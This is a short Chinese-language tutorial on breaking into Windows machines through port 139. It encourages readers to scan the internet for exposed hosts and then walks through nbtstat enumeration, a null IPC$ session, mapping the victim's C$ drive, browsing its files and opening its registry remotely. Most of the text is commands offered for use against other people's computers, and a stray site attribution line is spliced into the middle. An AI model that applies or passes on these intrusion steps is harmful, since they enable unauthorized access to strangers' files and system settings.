139端口入侵教程:
很实用呀,大家有兴趣可以试试
首先当然是扫一下网上开了139端口的机子了
其实139端口也就是NetBIOS session端口 进行文件和打印共享的端口,你要先用
NBTSTAT看一下NETBIOS的信息
命令方式nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r]
[-S] [-s] [interval]开关: -a 列出给定主机名的远程计算机的名字表(name
table)
-A 列出给定IP地址的远程计算机的名字表 -c 列出远程名字缓冲区(name cache
),包括IP地址
-n 列出本地NetBIOS 名字
-r 列出通过广播(broadcast)和WINS解析的名字
-R 清除和重新装入远程的缓冲的名字表
-S 列出和目标IP地址会话的表
-s 列出会话表转换
OK,我们在来看看共享
C:\>net view \\[目标计算机的IP地址]
不过有可能会被拒绝
在试试C:\>net use \\IP\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\IP Shared resources at \\IP
Share name Type Used as Comment
IPC成功建立后,服务器的共享资源列表才能访问到
我们在看一下有没有可以用net命令进行连接的,
实例检测139端口
,电脑资料
《实例检测139端口》(https://www.unjs.com)。c:\>net use x: \\[ipaddr]\[share]
万一不行的话我们就用上面的方法IPC$
一旦IPC$共享顺利完成,我们就可以映射了,(晕,不知什么是映射,下次在说
吧):
c:\>net use g: \\IP\c$
得到了C$共享,并将该目录映射到g:,键入:
c:\>dir g: /p
就能显示这个目录的所有内容。
成功地进行了IPC$连接后,点击Start -> Run,键入regedit。选择Registry ->
Connect Network Registry,再键入那台机器的IP地址。不一会,就能看目标计
算机的的Registry了。
呵呵,搞定了
这个命令很有用呀
C:\>net use \\0.0.0.0\ipc$ 密码/user:用户名
这个也可以
c:\>net use g: \\IP\c$